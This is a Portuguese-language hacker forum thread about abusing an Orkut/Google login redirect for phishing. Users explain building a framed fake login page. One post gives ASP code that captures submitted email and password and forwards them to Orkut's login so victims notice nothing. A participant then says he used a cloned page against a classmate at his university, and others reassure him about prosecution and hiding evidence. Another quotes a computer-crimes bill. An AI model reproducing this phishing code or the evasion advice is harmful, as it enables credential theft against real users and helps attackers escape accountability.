Pequena "falha" do orkut que dá pra usar com Phishing..

[bloodrain]

man.nao entendi nada do vc falou

[kmrafa]

bloodrain...

acho que entendi..se você entende um poukinho de web design você vai compreende melhor..

bom iframe são quadros neh..intao  pelo q entendi, cria-se uma página de quadros...dexa o top iframe e o iframe normal... ai no iframe onde tem pra você coloca o login e senha.. cria um iframe, mais com seus codigo em asp..para salvar no seu email ou sei lah... ate ai eu entendi eu axo..

mais ai... esse negócio do load.. "sendo que ao der 'load' ele irá submitar os dados que pegou da página anterior, sendo o action o orkut." n entendi muito bem..q pagina anterior?

flw..

[Anonymous]

eh a pagina do login, onde vc poe as informações

[kmrafa]

pois é...mais como vai ser anterior, se éa primeira que eu to fazendo :|

[Shady]

Ele esta dizendo para redirecionar os dados capturados para o proprio login do orkut, assim a pessoa realmente se loga no orkut e nao percebe o que aconteceu.

 @Lammer

 Sim, e um simples redirecionamento, mas com isso a pessoa verifica o endereco e ve que realmente e a pagina do orkut e nao hesita em colocar seus dados. Ao ser redirecionada, os dados que ela pos vao junto, permitindo que voce os capture. Isso e o que torna a descoberta util.

 Mesmo que voce nao consiga capturar os dados, o link inicial acessado pela pessoa e www.orkut.com . Mesmo que depois disso ela seja transferida pra qualquer outro endereco e tenha que colocar os dados novamente, ela pensa "bom, mas eu tava no orkut, nao tem erro".

[Anonymous]

Isso ai Shady,... acho que falei demais da conta hehehe...
Mas um truque mais básico do que isso consiste em pegar a info do form e adicionar a uma url...

Não sei se seu forte é de fato o asp, mas analize.

Código Selecionar Expandir

<%
Response.Redirect("https://www.google.com/accounts/service=orkut&(...)&Email=" &_
Request.Forms("Email") &_
"&Passwd=" &_
Request.Forms("Passwd") &_
"(...)&continue=http://www.orkut.com"
%>
Bem, ele pega os dados da página anterior e insere nesse link maldito ai que manda direto pro orkut... e caso login e senha estejam errados, ele retorna aquela page defaut do google accounts...

Util contra floods de phishing hehehe

*As partes em (...) eu realmente não lembro o que por

[Anonymous]

soh uma duvida... eu fiz uma copia do orkut e coloquei esse codigo que ta no post, e puis num pc da facu... agora tem um bixa resentido que se axa o banbanban da facu que caiu e disse que nao vai ficar barato isso... ele disse que vai usar a Justiça, qual as possibilidades dele usar a Justiça para me ferrar?

[HadeS]

Quase nulas.

Ninguém vai preso por "invadir" o Orkut de ninguém. Fica sossegado.

O máximo que pode vir a acontecer é a Google tirar o redirecionamento da URL (Não o deixar visível), mas mesmo assim é díficil.

HadeS

[bloodrain]

acho mto dificil ele se dar esse trabalho massssss
ele tem todo o direito
acho que vc deveria conversar com ele

talvez vc pode ser pego em todos estes artigos:

artigo 3º Para fins desta lei, entende-se por informações privadas aquelas relativas a pessoa física ou jurídica identificada ou identificável.
   PARÁGRAFO ÚNICO: É IDENTIFICÁVEL A PESSOA CUJA INDIVIDUAÇÃO NÃO ENVOLVA CUSTOS OU PRAZOS DESPROPORCIONADOS.

artigo 4º. Ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei.

artigo 5º. A coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem.
   
    § 1º. A TODA PESSOA CADASTRADA. DAR-SE-Á CONHECIMENTO DAS INFORMAÇÕES PRIVADAS ARMAZENADAS E DAS RESPECTIVAS FONTES.
    § 2º. FICA ASSEGURADO O DIREITO A RETIFICAÇÃO DE QUALQUER INFORMAÇÃO PRIVADA INCORRETA.
    § 3º. SALVO POR DISPOSIÇÃO LEGAL OU DETERMINAÇÃO JUDICIAL EM CONTRÁRIO, NENHUMA INFORMAÇÃO PRIVADA SERÁ MANTIDA À REVELIA DA PESSOA A QUE SE REFERE OU ALÉM DO TEMPO PREVISTO PARA A SUA VALIDADE.
    § 4º. QUALQUER PESSOA, FÍSICA OU JURÍDICA, TEM O DIRETO DE INTERPELAR O PROPRIETÁRIO DE REDE DE COMPUTADORES OU PROVEDOR DE SERVIÇO PARA SABER SE MANTÉM INFORMAÇÕES A SEU RESPEITO, E O RESPEITO DO TEOR.

artigo 6º. Os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião política, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade. pública ou privada, salvo autorização expressa do interessado.

artigo 7º. O acesso de terceiros, não autorizados pelos respectivos interessados, a informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.

CAPÍTULO III
DOS CRIMES DE INFORMÁTICA
Seção I
Dano a dado ou programa de computador

artigo 8º. Apagar, destruir, modificar ou de. qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada.
Pena: detenção de um a três anos e multa.
   
    PARÁGRAFO ÚNICO: SE O CRIME É COMETIDO:
    I - CONTRA O INTERESSE DA UNIÃO, ESTADO, DISTRITO FEDERAL, MUNICÍPIO, ÓRGÃO OU ENTIDADE DA ADMINISTRAÇÃO DIRETA OU INDIRETA OU DE EMPRESA CONCESSIONÁRIA DE SERVIÇOS PÚBLICOS,
    II - COM CONSIDERÁVEL PREJUÍZO PARA A VÍTIMA;
    III - COM INTUITO DE LUCRO OU VANTAGEM DE QUALQUER ESPÉCIE, PRÓPRIA OU DE TERCEIRO;
    IV - COM ABUSO DE CONFIANÇA;
    IV - POR MOTIVO FÚTIL;
    VI - COM O USO INDEVIDO DE SENHA OU PROCESSO DE IDENTIFICAÇÃO DE TERCEIRO OU
    VII - COM A UTILIZAÇÃO DE QUALQUER OUTRO MEIO FRAUDULENTO
    PENA: DETENÇÃO, DE DOIS A QUATRO ANOS E MULTA

Seção II
Acesso indevido ou não autorizado

artigo 9º. Obter acesso, indevido ou não autorizado, a computador ou rede de computadores
Pena. detenção, de seis meses a um ano e multa
   
    PARÁGRAFO PRIMEIRO. NA MESMA PANA INCORRE QUEM, SEM AUTORIZAÇÃO OU INDEVIDAMENTE, OBTÉM, MANTÉM OU FORNECE A TERCEIRO QUALQUER MEIO DE IDENTIFICAÇÃO OU ACESSO A COMPUTADOR OU REDE DE COMPUTADORES.
    PARÁGRAFO SEGUNDO. SE O CRIME É COMETIDO;
    I - COM ACESSO A COMPUTADOR OU REDE DE COMPUTADORES DA UNIÃO, ESTADO, DISTRITO FEDERAL, MUNICÍPIO, ÓRGÃO OU ENTIDADE DA ADMINISTRAÇÃO DIRETA OU INDIRETA OU DE EMPRESA CONCESSIONÁRIA DE SERVIÇOS PÚBLICOS;
    II - COM CONSIDERÁVEL PREJUÍZO PARA A VÍTIMA;
    III - COM INTUITO DE LUCRO OU VANTAGEM DE QUALQUER ESPÉCIE, PRÓPRIA OU DE TERCEIRO;
    IV - COM ABUSO DE CONFIANÇA;
    IV - POR MOTIVO FÚTIL;
    VI - COM O USO INDEVIDO DE SENHA OU PROCESSO DE IDENTIFICAÇÃO DE TERCEIRO; OU
    VII - COM A UTILIZAÇÃO DE QUALQUER OUTRO MEIO FRAUDULENTO.
    PENA DETENÇÃO, DE UM A DOIS ANOS E MULTA.

Seção III
Alteração desenha ou mecanismo de acesso a programa de computador ou dados

artigo 10. Apagar, destruir, alterar ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, deforma indevida ou não autorizada
Pena. detenção de um a dois anos e multa,

Seção IV
obtenção indevida ou não autorizada de dado ou instrução de computador

artigo 11. Obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador.
Pena: detenção, de três meses a um ano e multa.
   
    PARÁGRAFO ÚNICO. SE O CRIME É COMETIDO:
    I - COM ACESSO A COMPUTADOR OU REDE DE COMPUTADORES DA UNIÃO, ESTADO, DISTRITO FEDERAL, MUNICÍPIO, ÓRGÃO OU ENTIDADE DA ADMINISTRAÇÃO DIRETA OU INDIRETA OU DE EMPRESA. CONCESSIONÁRIA DE SERVIÇOS PÚBLICOS,
    II - COM CONSIDERÁVEL PREJUÍZO PARA A VÍTIMA;
    III - COM INTUITO DE LUCRO OU VANTAGEM DE QUALQUER ESPÉCIE, PRÓPRIA OU DE TERCEIRO;
    IV - COM ABUSO DE CONFIANÇA;
    IV - POR MOTIVO FÚTIL;
    VI - COM O USO INDEVIDO DE SENHA OU PROCESSO DE IDENTIFICAÇÃO DE TERCEIRO; OU
    VII - COM A UTILIZAÇÃO DE QUALQUER OUTRO MEIO FRAUDULENTO.
    PENAS DETENÇÃO, DE UM A DOIS ANOS E MULTA.

Seção V
Violação de segredo armazenado em computador,
meio magnético, de natureza magnética, óptica ou similar

artigo 12. Obter segredos; de indústria ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada.
Pena; detenção, de um a três anos e multa.

Seção VI
Criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos

artigo 13. Criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de qualquer forma dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores.
Pena. reclusão, de um a quatro anos e multa.
   
    PARÁGRAFO ÚNICO: SE O CRIME É COMETIDO:
    I - CONTRA O INTERESSE DA UNIÃO, ESTADO, DISTRITO FEDERAL, MUNICÍPIO, ÓRGÃO OU ENTIDADE DA ADMINISTRAÇÃO DIRETA OU INDIRETA OU DE EMPRESA CONCESSIONÁRIA DE SERVIÇOS PÚBLICOS,
    II - COM CONSIDERÁVEL PREJUÍZO PARA A VÍTIMA;
    III - COM INTUITO DE LUCRO OU VANTAGEM DE QUALQUER ESPÉCIE, PRÓPRIA OU DE TERCEIRO;
    IV - COM ABUSO DE CONFIANÇA;
    IV - POR MOTIVO FÚTIL;
    VI - COM O USO INDEVIDO DE SENHA OU PROCESSO DE IDENTIFICAÇÃO DE TERCEIRO OU
    VII - COM A UTILIZAÇÃO DE QUALQUER OUTRO MEIO FRAUDULENTO
    PENA: RECLUSÃO, DE DOIS A SEIS ANOS E MULTA.

alem de talvez possa ser adicionado ai ESTELIONATO
alem de que se a direçao da faculdade ficar sabendo nao vai ser nem um pouco bom pra vc
 vc pode se foder legal
converse com ele
porra man como eh que vc assume que foi vc?
po entao que se acha o banbanban nao seria vc?
e soh nao va nem citar o darkers

[Anonymous]

eu nao disse ki fui eu nem nada... foi a vaca de uma menina ki disse pois nois tavamos montando o site juntos e ela me apunhalou... mais o redirecionamento ja nao existe mais, e as contas de email que eu usava para receber nao existem mais...

entao nao tem como ele provar que o site foi aberto na facu, ou tem???

[d3rf]

Cara teoricamente, vc não roubou ! Ele te deu ! ... outra ...
Provar coisas usando PC, ainda é muito difícil ... eles vão kerer te pegar pela página de redirecionamento, mas como vc deve ser malandro usou dados fakes ... se não ... NO demais, não compensa para a polícia, nem para advogado entrar nessa .
A respeito da falha do Orkut, achei muito interessante, e mesmo q seja "simples" como disseram, descobri-la nao foi tão simples, se fosse algo tão na cara, o Google nao daria um mole desse... Parabéns para kem descobriu ...

[kmrafa]

af parem com isso... no BR existem milhoes de leis.... pouca sao cumpridas...e levadas a serio...e ainda tem aquela que nao sao regulamentadas ainda... nao sei se eh o caso..

Mais po, o kara ser preso por orkut, se fosse assim, nos estariamos presos tb...rsrs...difundindo informação que pode fazer mal a terceiros... coisa do tpw

muito dificil, quase nula a chance... tanto cara roubando dinheiro por keylogger,e nao acontece nada..


só se o kara for tipo o filho do governador uhauhuaa.. ai sim... nesse pais só kara importante que ve as coisas acontecer...

depois desse discurso... kmrafa para presidente! =P hueahuea

flw..